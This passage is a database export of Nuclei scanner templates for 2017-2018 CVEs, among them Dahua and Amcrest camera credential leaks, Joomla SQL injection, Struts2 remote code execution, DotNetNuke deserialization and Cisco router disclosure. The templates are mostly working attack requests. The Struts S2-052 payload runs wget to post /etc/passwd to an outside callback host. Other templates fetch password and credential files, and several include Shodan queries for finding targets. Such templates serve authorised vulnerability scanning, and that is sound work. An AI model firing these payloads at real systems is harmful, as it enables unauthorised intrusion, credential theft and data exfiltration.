cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-7925\n cwe-id: CWE-522,CWE-260\n epss-score: 0.42592\n epss-percentile: 0.97235\n cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dahuasecurity\n product: dh-ipc-hdbw23a0rn-zs_firmware\n shodan-query: http.favicon.hash:2019488876\n tags: cve,cve2017,dahua,camera,dahuasecurity\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/current_config/passwd\"\n\n matchers:\n - type: dsl\n dsl:\n - contains(to_lower(body), \"ugm\")\n - contains(to_lower(body), \"id:name:passwd\")\n - status_code == 200\n condition: and\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 1:(.*:.*):1:CtrPanel\n# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950", "hash": "20bb4be75b4f5a349e5f51391cd3e95f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308008" }, "name": "CVE-2017-8229.yaml", "content": "id: CVE-2017-8229\n\ninfo:\n name: Amcrest IP Camera Web Management - Data Exposure\n author: pussycat0x\n severity: critical\n description: |\n Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n impact: |\n An attacker can gain unauthorized access to sensitive data.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2017-8229\n - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html\n - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf\n - https://seclists.org/bugtraq/2019/Jun/8\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-8229\n cwe-id: CWE-255\n epss-score: 0.89506\n epss-percentile: 0.98685\n cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: amcrest\n product: ipm-721s_firmware\n shodan-query: html:\"Amcrest\"\n fofa-query: \"Amcrest\"\n tags: cve2017,cve,packetstorm,seclists,amcrest,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/current_config/Sha1Account1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DevInformation\"\n - \"SerialID\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950", "hash": "fcebdb82aa5472fc0d7107411eb26fce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308009" }, "name": "CVE-2017-8917.yaml", "content": "id: CVE-2017-8917\n\ninfo:\n name: Joomla! <3.7.1 - SQL Injection\n author: princechaddha\n severity: critical\n description: |\n Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.\n remediation: |\n Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability.\n reference:\n - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-8917\n - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522\n - http://www.securitytracker.com/id/1038522\n - https://github.com/binfed/cms-exp\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-8917\n cwe-id: CWE-89\n epss-score: 0.97555\n epss-percentile: 0.99997\n cpe: cpe:2.3:a:joomla:joomla\\!:3.7.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: joomla\n product: joomla\\!\n shodan-query: http.component:\"Joomla\"\n tags: cve2017,cve,joomla,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950", "hash": "30a683b5f1e906ca4f6608632d7bee3e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800a" }, "name": "CVE-2017-9140.yaml", "content": "id: CVE-2017-9140\n\ninfo:\n name: Reflected XSS - Telerik Reporting Module\n author: dhiyaneshDk\n severity: medium\n description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement of web pages, or theft of sensitive information.\n remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.\n reference:\n - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9140\n - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module\n - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406)\n - https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-9140\n cwe-id: CWE-79\n epss-score: 0.00191\n epss-percentile: 0.55758\n cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: progress\n product: telerik_reporting\n tags: cve2017,cve,xss,telerik,progress\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '#000000\"onload=\"prompt(1)'\n - 'Telerik.ReportViewer.axd?name=Resources'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950", "hash": "d017a4ccb6c94155e2811b31b7822d36", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800b" }, "name": "CVE-2017-9288.yaml", "content": "id: CVE-2017-9288\n\ninfo:\n name: WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Raygun4WP plugin (1.8.0 or higher) to mitigate this vulnerability.\n reference:\n - https://github.com/MindscapeHQ/raygun4wordpress/pull/17\n - https://github.com/MindscapeHQ/raygun4wordpress/issues/16\n - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9288\n - https://wpvulndb.com/vulnerabilities/8836\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-9288\n cwe-id: CWE-79\n epss-score: 0.00168\n epss-percentile: 0.52791\n cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: raygun\n product: raygun4wp\n framework: wordpress\n tags: cve2017,cve,wordpress,xss,wp-plugin,raygun\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Raygun4WP'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009a5bb9d6ed82d7766d04e93226e4ab9aaacc265ab8feee1621e74ecd4b7fb76e022100aea36e48ce640598175ed79b106073b46b52ac7bacff32398f09dfbb02f8d5ae:922c64590222798bb761d5b6d8e72950", "hash": "52311bd3e108ce84dae927b3776bbfa5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800c" }, "name": "CVE-2017-9416.yaml", "content": "id: CVE-2017-9416\n\ninfo:\n name: Odoo 8.0/9.0/10.0 - Local File Inclusion\n author: Co5mos\n severity: medium\n description: |\n Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Allows an attacker to read arbitrary files on the server.\n remediation: |\n Upgrade to a patched version of Odoo or apply the necessary security patches.\n reference:\n - https://github.com/odoo/odoo/issues/17394\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9416\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2017-9416\n cwe-id: CWE-22\n epss-score: 0.01037\n epss-percentile: 0.83585\n cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: odoo\n product: odoo\n tags: cve2017,cve,odoo,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/base_import/static/c:/windows/win.ini\"\n - \"{{BaseURL}}/base_import/static/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950", "hash": "d9b605ee3d57fd21e4e98315e489f54c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800d" }, "name": "CVE-2017-9506.yaml", "content": "id: CVE-2017-9506\n\ninfo:\n name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery\n author: pdteam\n severity: medium\n description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.\n impact: |\n Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential server-side attacks.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities.\n reference:\n - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html\n - https://ecosystem.atlassian.net/browse/OAUTH-344\n - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9506\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-9506\n cwe-id: CWE-918\n epss-score: 0.00575\n epss-percentile: 0.75564\n cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: oauth\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2017,atlassian,jira,ssrf,oast\n\nhttp:\n - raw:\n - |\n GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950", "hash": "62bf06870a4b4a2f07d2780d86bc4860", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800e" }, "name": "CVE-2017-9791.yaml", "content": "id: CVE-2017-9791\n\ninfo:\n name: Apache Struts2 S2-053 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: |\n Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n - http://struts.apache.org/docs/s2-048.html\n - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838\n - http://www.securitytracker.com/id/1038838\n - https://security.netapp.com/advisory/ntap-20180706-0002/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-9791\n cwe-id: CWE-20\n epss-score: 0.97448\n epss-percentile: 0.99947\n cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: struts\n shodan-query: title:\"Struts2 Showcase\"\n fofa-query: title=\"Struts2 Showcase\"\n tags: cve2017,cve,apache,rce,struts,kev\nvariables:\n num1: \"{{rand_int(40000, 44800)}}\"\n num2: \"{{rand_int(40000, 44800)}}\"\n result: \"{{to_number(num1)*to_number(num2)}}\"\n\n# CMD: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)}\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/integration/saveGangster.action\"\n\n body: |\n name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{result}}\"\n - \"added successfully\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d5e3820e512db011373ede9813749ce666b0b1030e3bafb75a433c8f747058d022100a71caf04a60f079184c23f7c442ca72d1e8642ac385157ab9944830e92448b58:922c64590222798bb761d5b6d8e72950", "hash": "4d43d2d7c8f02f3a55972c934f9b757a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800f" }, "name": "CVE-2017-9805.yaml", "content": "id: CVE-2017-9805\n\ninfo:\n name: Apache Struts2 S2-052 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n - https://struts.apache.org/docs/s2-052.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9805\n - http://www.securitytracker.com/id/1039263\n - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-9805\n cwe-id: CWE-502\n epss-score: 0.97541\n epss-percentile: 0.99995\n cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: struts\n tags: cve,cve2017,apache,rce,struts,kev\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/struts2-rest-showcase/orders/3\"\n - \"{{BaseURL}}/orders/3\"\n\n body: |\n \n \n \n 0\n \n \n \n \n \n false\n 0\n \n \n \n \n \n wget\n --post-file\n /etc/passwd\n {{interactsh-url}}\n \n false\n \n \n \n \n java.lang.ProcessBuilder\n start\n \n \n asdasd\n \n asdasd\n \n \n \n \n \n false\n 0\n 0\n false\n \n false\n \n \n \n 0\n \n \n \n \n \n \n \n \n \n\n headers:\n Content-Type: application/xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Debugging information\"\n - \"com.thoughtworks.xstream.converters.collections.MapConverter\"\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950", "hash": "cdda29787e5dff711549304a707e5bf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308010" }, "name": "CVE-2017-9822.yaml", "content": "id: CVE-2017-9822\n\ninfo:\n name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution\n author: milo2012\n severity: high\n description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution.\n impact: |\n Remote code execution through cookie deserialization\n remediation: |\n Upgrade DotNetNuke to a version higher than 9.3.0\n reference:\n - https://github.com/murataydemir/CVE-2017-9822\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9822\n - http://www.dnnsoftware.com/community/security/security-center\n - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html\n - https://github.com/xbl3/awesome-cve-poc_qazbnm456\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-9822\n cwe-id: CWE-20\n epss-score: 0.97056\n epss-percentile: 0.99742\n cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dnnsoftware\n product: dotnetnuke\n tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware\n\nhttp:\n - raw:\n - |\n GET /__ HTTP/1.1\n Host: {{Hostname}}\n Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\n X-Requested-With: XMLHttpRequest\n Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\\Windows\\win.ini\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '[extensions]'\n - 'for 16-bit app support'\n condition: and\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950", "hash": "18e84e91a28bf8432bf68b275a7a2aa8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308011" }, "name": "CVE-2017-9833.yaml", "content": "id: CVE-2017-9833\n\ninfo:\n name: BOA Web Server 0.94.14 - Arbitrary File Access\n author: 0x_Akoko\n severity: high\n description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of \"../..\" using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.\n impact: |\n An attacker can gain unauthorized access to sensitive files on the server.\n remediation: |\n Upgrade to a patched version of BOA Web Server or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/42290\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9833\n - https://pastebin.com/raw/rt7LJvyF\n - https://www.exploit-db.com/exploits/42290/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-9833\n cwe-id: CWE-22\n epss-score: 0.7354\n epss-percentile: 0.98027\n cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: boa\n product: boa\n tags: cve,cve2017,boa,lfr,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950", "hash": "9ac725454505b5f3e69ea03924815ca4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308012" }, "name": "CVE-2017-9841.yaml", "content": "id: CVE-2017-9841\n\ninfo:\n name: PHPUnit - Remote Code Execution\n author: Random_Robbie,pikpikcu\n severity: critical\n description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a \"\n - |\n GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"6dd70f16549456495373a337e6708865\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a8b27a306468aebf732343c961456cf2432fb5a516c6c85ff6c4c62f0c01316e022100f2d5e57852cf73ca6546ebd6ddfbbec82b18542a7a84767a25cc65335fe9213d:922c64590222798bb761d5b6d8e72950", "hash": "70fe088563a754f846e0898c87251b57", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308013" }, "name": "CVE-2018-0127.yaml", "content": "id: CVE-2018-0127\n\ninfo:\n name: Cisco RV132W/RV134W Router - Information Disclosure\n author: jrolf\n severity: critical\n description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the router.\n remediation: |\n Apply the latest firmware update provided by Cisco to fix the vulnerability.\n reference:\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2\n - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345\n - https://nvd.nist.gov/vuln/detail/CVE-2018-0127\n - http://www.securitytracker.com/id/1040345\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-0127\n cwe-id: CWE-306,CWE-200\n epss-score: 0.09982\n epss-percentile: 0.94323\n cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: \"cisco\"\n product: rv132w_firmware\n tags: cve,cve2018,cisco,router\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dumpmdm.cmd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Dump\"\n - \"MDM\"\n - \"cisco\"\n - \"admin\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210099b0004c78261546ddee92f813ed07033007e7a8dd0ff0a86a8f24eedf199617022100a4d24a04b55d1f74aeb50551620875db7c38cba9f89652f3a5dbf50e545fae29:922c64590222798bb761d5b6d8e72950", "hash": "916f8ba48ca2ac7458d7768af2c36f08", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308014" }, "name": "CVE-2018-0296.yaml", "content": "id: CVE-2018-0296\n\ninfo:\n name: Cisco ASA - Local File Inclusion\n author: organiccrap\n severity: high\n description: |\n Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD 